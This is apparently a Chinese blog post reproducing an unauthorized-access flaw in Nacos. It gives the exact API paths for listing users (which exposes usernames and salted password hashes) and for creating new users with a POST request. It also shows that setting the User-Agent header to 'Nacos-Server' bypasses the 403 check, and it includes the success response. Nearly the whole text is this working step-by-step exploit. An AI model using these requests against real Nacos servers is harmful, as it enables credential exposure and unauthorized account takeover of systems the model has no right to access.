Nacos未授权复现

Nacos入口

ip:端口/nacos

www.test.com:8848/nacos

未授权查看用户列表

http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=1

直接get方式访问该路径会403，
将user-agent头修改为Nacos-Server即可绕过403。

有些可以直接访问，有些需要改UA头

此时看到响应包中包含了系统存在的用户名nacos，密码为加盐之后的值。

未授权创建用户

访问  http://ip:8848/nacos/v1/auth/users

POST传参：  username=abcabc&password=abcabc

如果出现403，别忘了修改User-Agent头为Nacos-Server

发送POST请求

{“code”: 200,”message”: null,”data”: “create user ok!”}

返回响应200，创建用户成功

查看现在存在几个用户

访问http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=9

http://ip:8848：指明了要请求的目标IP地址和端口号；

/nacos/v1/auth/users：指明了要访问的Nacos API接口路径；

pageNo=1&pageSize=9：指定了分页查询条件。

pageNo：表示需要返回的页码，从 1 开始计数。例如，如果想要返回第 2 页的数据，则将 pageNo 设置为 2。

pageSize：表示每一页的数据条数。例如，如果想要每页返回 20 条数据，则将 pageSize 设置为 20。

OK,

刚刚创建的abcabc用户已经存在了。

更多方法
https://blog.csdn.net/m0_73353130/article/details/131786333